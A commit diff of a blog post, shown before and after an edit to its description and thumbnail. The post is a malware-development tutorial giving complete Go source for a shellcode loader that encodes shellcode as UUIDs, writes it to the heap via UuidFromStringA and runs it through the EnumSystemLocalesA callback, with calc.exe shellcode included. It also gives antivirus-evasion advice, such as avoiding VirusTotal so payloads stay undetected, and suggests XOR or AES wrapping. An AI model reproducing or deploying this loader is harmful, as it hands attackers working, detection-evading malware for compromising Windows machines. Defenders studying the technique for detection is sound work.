public/content/malware-development-uuidfromstring-shellcode-injection-golang.md, before:

---
title: "Malware-Development-2-UuidFromString-shellcode-injection-(Golang)"
description: "today we’ll learn an advanced shellcode injection technique used by Lazarus group which uses UuidFromStringA API call. In this..."
slug: "malware-development-uuidfromstring-shellcode-injection-golang"
date: "2024-10-14"
author: "Waseem Akram"
image: "/placeholder.svg"
---

## Introduction

Today we’ll learn an advanced shellcode injection technique used by Lazarus group which uses `UuidFromStringA` API call. In this technique, the malware uses the `UuidFromStringA` API to convert a string into a `UUID`. The malware then uses the UUID to locate the address of the shellcode in memory. The malware then injects the shellcode into the target process using the `CreateRemoteThread` API call.

## Explanation

In this demo we’ll be using a `calc.exe` shellcode instead of a reverse shell

> calc.exe shellcode in Golang format

```go
calc_shellcode := []byte{0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6a, 0x60, 0x5a, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x48, 0x83, 0xec, 0x28, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x3, 0x57, 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x1, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 0xf, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x2, 0xad, 0x81, 0x3c, 0x7, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x1, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x1, 0xf7, 0x99, 0xff, 0xd7, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0x5f, 0x5e, 0x5b, 0x5a, 0x59, 0x58, 0xc3}
```

This technique uses `UuidFromStringA` API call from `Rpcrt4.dll` which can be used to decode shellcode as uuid and writing it to a heap pointer. In this way it doesn’t use `WriteProcessMemory.`

It also uses `EnumSystemLocalesA` API call from kernel32.dll to resume and execute shellcode

At this point, if you have read my last post talking about `CreateRemoteThread` you may have noticed that all shellcode injection technique try to achieve this results:

- 1. Allocate memory
- 2. Write buffer
- 3. Execute shellcode

As you can see the used functions change but the goal is the same so the key is doing this with uncommon API calls

## Code

```go
package main

import (
  "os"
  "fmt"
  "log"
  "bytes"
  "unsafe"
  "encoding/binary"

  "golang.org/x/sys/windows"
  "github.com/google/uuid"
)
```

Before allocating any memory we should convert our shellcode to `UUID`

```go
...

// Check shellcode length to add some zero
if 16 - len(shellcode) %16 < 16 {
  pad := bytes.Repeat([]byte{byte(0x90)}, 16-len(shellcode)%16)
  shellcode = append(shellcode, pad...)
}

var uuids []string
for i := 0; i < len(shellcode); i += 16 {
  var uuidBytes []byte

  buf := make([]byte, 4)
  binary.LittleEndian.PutUint32(buf, binary.BigEndian.Uint32(shellcode[i:i+4]))
  uuidBytes = append(uuidBytes, buf...)

  buf = make([]byte, 2)
  binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+4:i+6]))
  uuidBytes = append(uuidBytes, buf...)

  buf = make([]byte, 2)
  binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+6:i+8]))
  uuidBytes = append(uuidBytes, buf...)

  uuidBytes = append(uuidBytes, shellcode[i+8:i+16]...)

  // Use official Google package to convert bytes to uuid
  u, err := uuid.FromBytes(uuidBytes)
  if err != nil {
    log.Fatal(fmt.Errorf("there was an error converting bytes into a UUID:\n%s", err))
  }

  uuids = append(uuids, u.String())
}

...
```

Once we have converted the shellcode to UUIDs we start creating a **heap** and allocating memory:

```go
...

// Import DLL
kernel32 := windows.NewLazyDLL("kernel32")

// Get functions from kernel32.dll
HeapCreate := kernel32.NewProc("HeapCreate")
HeapAlloc := kernel32.NewProc("HeapAlloc")

// Create heap
heapAddr, _, err := HeapCreate.Call(
  0x00040000,
  0,
  0,
)

if heapAddr == 0 { // Handle error
  log.Fatal(err)
}

// Allocate heap memory
addr, _, err := HeapAlloc.Call(
  heapAddr,
  0,
  0x00100000,
)

if addr == 0 { // Handle error
  log.Fatal(err)
}

...
```

Now we have to use `UuidFromStringA` to decode and write the shellcode to memory iterating over all the UUIDs

```go
...

// Load dll
rpcrt4 := windows.NewLazySystemDLL("Rpcrt4.dll")
UuidFromStringA := rpcrt4.NewProc("UuidFromStringA")

addrPtr := addr
// Iterate over all UUIDs
for _, uuid := range uuids {
  u := append([]byte(uuid), 0)

  // Call function
  rpcStatus, _, err := UuidFromStringA.Call(
    uintptr(unsafe.Pointer(&u[0])),
    addrPtr,
  )

  if rpcStatus != 0 { // Handle error
    log.Fatal(err)
  }

  addrPtr += 16
}

...
```

And finally to execute the shellcode we use `EnumSystemLocalesA` as there are some API calls which use callback functions so can be abused to execute shellcode.

```go
...

// Get API call
EnumSystemLocalesA := kernel32.NewProc("EnumSystemLocalesA")

ret, _, err := EnumSystemLocalesA.Call(addr, 0)
if ret == 0 { // Handle error
  log.Fatal(err)
}

...
```

Let’s put all together to make it work. The final code should be something like this:

```go
package main

/*

Author: Waseem Akram
Blog post: https://hackerwasii.com/blogposts/malware-development-uuidfromstring-shellcode-injection-golang

*/

import (
  "fmt"
  "log"
  "bytes"
  "unsafe"
  "encoding/binary"

  "golang.org/x/sys/windows"
  "github.com/google/uuid"
)

func main(){
  var shellcode = []byte{0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6a, 0x60, 0x5a, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x48, 0x83, 0xec, 0x28, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x3, 0x57, 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x1, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 0xf, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x2, 0xad, 0x81, 0x3c, 0x7, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x1, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x1, 0xf7, 0x99, 0xff, 0xd7, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0x5f, 0x5e, 0x5b, 0x5a, 0x59, 0x58, 0xc3}

  // Check shellcode length to add some zero
  if 16 - len(shellcode) %16 < 16 {
    pad := bytes.Repeat([]byte{byte(0x90)}, 16-len(shellcode)%16)
    shellcode = append(shellcode, pad...)
  }

  // Convert shellcode to UUIDs
  fmt.Println("Converting shellcode to UUIDs...")
  var uuids []string
  for i := 0; i < len(shellcode); i += 16 {
    var uuidBytes []byte

    buf := make([]byte, 4)
    binary.LittleEndian.PutUint32(buf, binary.BigEndian.Uint32(shellcode[i:i+4]))
    uuidBytes = append(uuidBytes, buf...)

    buf = make([]byte, 2)
    binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+4:i+6]))
    uuidBytes = append(uuidBytes, buf...)

    buf = make([]byte, 2)
    binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+6:i+8]))
    uuidBytes = append(uuidBytes, buf...)

    uuidBytes = append(uuidBytes, shellcode[i+8:i+16]...)

    // Use official Google package to convert bytes to uuid
    u, err := uuid.FromBytes(uuidBytes)
    if err != nil {
      log.Fatal(fmt.Errorf("there was an error converting bytes into a UUID:\n%s", err))
    }

    uuids = append(uuids, u.String())
  }

  fmt.Println("UUIDs amount:", len(uuids))

  fmt.Println("Loading DLLs...")
  kernel32 := windows.NewLazyDLL("kernel32")
  HeapCreate := kernel32.NewProc("HeapCreate")
  HeapAlloc := kernel32.NewProc("HeapAlloc")
  EnumSystemLocalesA := kernel32.NewProc("EnumSystemLocalesA")

  rpcrt4 := windows.NewLazySystemDLL("Rpcrt4.dll")
  UuidFromStringA := rpcrt4.NewProc("UuidFromStringA")

  // Create heap
  fmt.Println("Calling HeapCreate...")
  heapAddr, _, err := HeapCreate.Call(
    0x00040000,
    0,
    0,
  )

  if heapAddr == 0 { // Handle error
    log.Fatal(err)
  }

  // Allocate heap memory
  fmt.Println("Calling HeapAlloc...")
  addr, _, err := HeapAlloc.Call(
    heapAddr,
    0,
    0x00100000,
  )

  if addr == 0 { // Handle error
    log.Fatal(err)
  }

  addrPtr := addr
  // Iterate over UUIDs to write shellcode
  for _, uuid := range uuids {
    u := append([]byte(uuid), 0)

    fmt.Println("Calling UuidFromStringA with UUID: " + uuid)
    rpcStatus, _, err := UuidFromStringA.Call(
      uintptr(unsafe.Pointer(&u[0])),
      addrPtr,
    )

    if rpcStatus != 0 { // Handle error
      log.Fatal(err)
    }

    addrPtr += 16
  }

  // Execute shellcode
  fmt.Println("Calling EnumSystemLocalesA...")
  ret, _, err := EnumSystemLocalesA.Call(addr, 0)
  if ret == 0 {
    log.Fatal(err)
  }

  fmt.Println("Shellcode should have been executed!")
}
```

Now compile the final program, transfer it to the “victim” PC and execute it, this is the results

![UuidFromString-compile](/images/posts/maldev/2/demo-uuidfromstring.webp)

After executing it, a **calc.exe** appears! It works!

Now let’s upload it to **antiscan.me** (not VirusTotal as it distributes malware so may burn out our payloads) and here are the results:

> [https://antiscan.me/scan/new/result?id=uopy3r7IvC6H](https://antiscan.me/scan/new/result?id=uopy3r7IvC6H)

As you can see any AV detected our .exe as malicious. However if you wanna add more protection to your shellcode injector you can use XOR or AES decryption

## References

```
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/
```

Commit message:

added thumbs for 2 posts, change description in posts

public/content/malware-development-uuidfromstring-shellcode-injection-golang.md, after:

---
title: "Malware-Development-2-UuidFromString-shellcode-injection-(Golang)"
description: "Today we’ll learn an advanced shellcode injection technique used by Lazarus group which uses UuidFromStringA API call. In this technique, the malware.."
slug: "malware-development-uuidfromstring-shellcode-injection-golang"
date: "2024-10-14"
author: "Waseem Akram"
image: "/images/posts/maldev/2/thumb-uuidfromstring.webp"
---

## Introduction

Today we’ll learn an advanced shellcode injection technique used by Lazarus group which uses `UuidFromStringA` API call. In this technique, the malware uses the `UuidFromStringA` API to convert a string into a `UUID`. The malware then uses the UUID to locate the address of the shellcode in memory. The malware then injects the shellcode into the target process using the `CreateRemoteThread` API call.

## Explanation

In this demo we’ll be using a `calc.exe` shellcode instead of a reverse shell

> calc.exe shellcode in Golang format

```go
calc_shellcode := []byte{0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6a, 0x60, 0x5a, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x48, 0x83, 0xec, 0x28, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x3, 0x57, 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x1, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 0xf, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x2, 0xad, 0x81, 0x3c, 0x7, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x1, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x1, 0xf7, 0x99, 0xff, 0xd7, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0x5f, 0x5e, 0x5b, 0x5a, 0x59, 0x58, 0xc3}
```

This technique uses `UuidFromStringA` API call from `Rpcrt4.dll` which can be used to decode shellcode as uuid and writing it to a heap pointer. In this way it doesn’t use `WriteProcessMemory.`

It also uses `EnumSystemLocalesA` API call from kernel32.dll to resume and execute shellcode

At this point, if you have read my last post talking about `CreateRemoteThread` you may have noticed that all shellcode injection technique try to achieve this results:

- 1. Allocate memory
- 2. Write buffer
- 3. Execute shellcode

As you can see the used functions change but the goal is the same so the key is doing this with uncommon API calls

## Code

```go
package main

import (
  "os"
  "fmt"
  "log"
  "bytes"
  "unsafe"
  "encoding/binary"

  "golang.org/x/sys/windows"
  "github.com/google/uuid"
)
```

Before allocating any memory we should convert our shellcode to `UUID`

```go
...

// Check shellcode length to add some zero
if 16 - len(shellcode) %16 < 16 {
  pad := bytes.Repeat([]byte{byte(0x90)}, 16-len(shellcode)%16)
  shellcode = append(shellcode, pad...)
}

var uuids []string
for i := 0; i < len(shellcode); i += 16 {
  var uuidBytes []byte

  buf := make([]byte, 4)
  binary.LittleEndian.PutUint32(buf, binary.BigEndian.Uint32(shellcode[i:i+4]))
  uuidBytes = append(uuidBytes, buf...)

  buf = make([]byte, 2)
  binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+4:i+6]))
  uuidBytes = append(uuidBytes, buf...)

  buf = make([]byte, 2)
  binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+6:i+8]))
  uuidBytes = append(uuidBytes, buf...)

  uuidBytes = append(uuidBytes, shellcode[i+8:i+16]...)

  // Use official Google package to convert bytes to uuid
  u, err := uuid.FromBytes(uuidBytes)
  if err != nil {
    log.Fatal(fmt.Errorf("there was an error converting bytes into a UUID:\n%s", err))
  }

  uuids = append(uuids, u.String())
}

...
```

Once we have converted the shellcode to UUIDs we start creating a **heap** and allocating memory:

```go
...

// Import DLL
kernel32 := windows.NewLazyDLL("kernel32")

// Get functions from kernel32.dll
HeapCreate := kernel32.NewProc("HeapCreate")
HeapAlloc := kernel32.NewProc("HeapAlloc")

// Create heap
heapAddr, _, err := HeapCreate.Call(
  0x00040000,
  0,
  0,
)

if heapAddr == 0 { // Handle error
  log.Fatal(err)
}

// Allocate heap memory
addr, _, err := HeapAlloc.Call(
  heapAddr,
  0,
  0x00100000,
)

if addr == 0 { // Handle error
  log.Fatal(err)
}

...
```

Now we have to use `UuidFromStringA` to decode and write the shellcode to memory iterating over all the UUIDs

```go
...

// Load dll
rpcrt4 := windows.NewLazySystemDLL("Rpcrt4.dll")
UuidFromStringA := rpcrt4.NewProc("UuidFromStringA")

addrPtr := addr
// Iterate over all UUIDs
for _, uuid := range uuids {
  u := append([]byte(uuid), 0)

  // Call function
  rpcStatus, _, err := UuidFromStringA.Call(
    uintptr(unsafe.Pointer(&u[0])),
    addrPtr,
  )

  if rpcStatus != 0 { // Handle error
    log.Fatal(err)
  }

  addrPtr += 16
}

...
```

And finally to execute the shellcode we use `EnumSystemLocalesA` as there are some API calls which use callback functions so can be abused to execute shellcode.

```go
...

// Get API call
EnumSystemLocalesA := kernel32.NewProc("EnumSystemLocalesA")

ret, _, err := EnumSystemLocalesA.Call(addr, 0)
if ret == 0 { // Handle error
  log.Fatal(err)
}

...
```

Let’s put all together to make it work. The final code should be something like this:

```go
package main

/*

Author: Waseem Akram
Blog post: https://hackerwasii.com/blogposts/malware-development-uuidfromstring-shellcode-injection-golang

*/

import (
  "fmt"
  "log"
  "bytes"
  "unsafe"
  "encoding/binary"

  "golang.org/x/sys/windows"
  "github.com/google/uuid"
)

func main(){
  var shellcode = []byte{0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6a, 0x60, 0x5a, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x48, 0x83, 0xec, 0x28, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x3, 0x57, 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x1, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 0xf, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x2, 0xad, 0x81, 0x3c, 0x7, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x1, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x1, 0xf7, 0x99, 0xff, 0xd7, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0x5f, 0x5e, 0x5b, 0x5a, 0x59, 0x58, 0xc3}

  // Check shellcode length to add some zero
  if 16 - len(shellcode) %16 < 16 {
    pad := bytes.Repeat([]byte{byte(0x90)}, 16-len(shellcode)%16)
    shellcode = append(shellcode, pad...)
  }

  // Convert shellcode to UUIDs
  fmt.Println("Converting shellcode to UUIDs...")
  var uuids []string
  for i := 0; i < len(shellcode); i += 16 {
    var uuidBytes []byte

    buf := make([]byte, 4)
    binary.LittleEndian.PutUint32(buf, binary.BigEndian.Uint32(shellcode[i:i+4]))
    uuidBytes = append(uuidBytes, buf...)

    buf = make([]byte, 2)
    binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+4:i+6]))
    uuidBytes = append(uuidBytes, buf...)

    buf = make([]byte, 2)
    binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+6:i+8]))
    uuidBytes = append(uuidBytes, buf...)

    uuidBytes = append(uuidBytes, shellcode[i+8:i+16]...)

    // Use official Google package to convert bytes to uuid
    u, err := uuid.FromBytes(uuidBytes)
    if err != nil {
      log.Fatal(fmt.Errorf("there was an error converting bytes into a UUID:\n%s", err))
    }

    uuids = append(uuids, u.String())
  }

  fmt.Println("UUIDs amount:", len(uuids))

  fmt.Println("Loading DLLs...")
  kernel32 := windows.NewLazyDLL("kernel32")
  HeapCreate := kernel32.NewProc("HeapCreate")
  HeapAlloc := kernel32.NewProc("HeapAlloc")
  EnumSystemLocalesA := kernel32.NewProc("EnumSystemLocalesA")

  rpcrt4 := windows.NewLazySystemDLL("Rpcrt4.dll")
  UuidFromStringA := rpcrt4.NewProc("UuidFromStringA")

  // Create heap
  fmt.Println("Calling HeapCreate...")
  heapAddr, _, err := HeapCreate.Call(
    0x00040000,
    0,
    0,
  )

  if heapAddr == 0 { // Handle error
    log.Fatal(err)
  }

  // Allocate heap memory
  fmt.Println("Calling HeapAlloc...")
  addr, _, err := HeapAlloc.Call(
    heapAddr,
    0,
    0x00100000,
  )

  if addr == 0 { // Handle error
    log.Fatal(err)
  }

  addrPtr := addr
  // Iterate over UUIDs to write shellcode
  for _, uuid := range uuids {
    u := append([]byte(uuid), 0)

    fmt.Println("Calling UuidFromStringA with UUID: " + uuid)
    rpcStatus, _, err := UuidFromStringA.Call(
      uintptr(unsafe.Pointer(&u[0])),
      addrPtr,
    )

    if rpcStatus != 0 { // Handle error
      log.Fatal(err)
    }

    addrPtr += 16
  }

  // Execute shellcode
  fmt.Println("Calling EnumSystemLocalesA...")
  ret, _, err := EnumSystemLocalesA.Call(addr, 0)
  if ret == 0 {
    log.Fatal(err)
  }

  fmt.Println("Shellcode should have been executed!")
}
```

Now compile the final program, transfer it to the “victim” PC and execute it, this is the results

![UuidFromString-compile](/images/posts/maldev/2/demo-uuidfromstring.webp)

After executing it, a **calc.exe** appears! It works!

Now let’s upload it to **antiscan.me** (not VirusTotal as it distributes malware so may burn out our payloads) and here are the results:

> [https://antiscan.me/scan/new/result?id=uopy3r7IvC6H](https://antiscan.me/scan/new/result?id=uopy3r7IvC6H)

As you can see any AV detected our .exe as malicious. However if you wanna add more protection to your shellcode injector you can use XOR or AES decryption

## References

```
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/
```
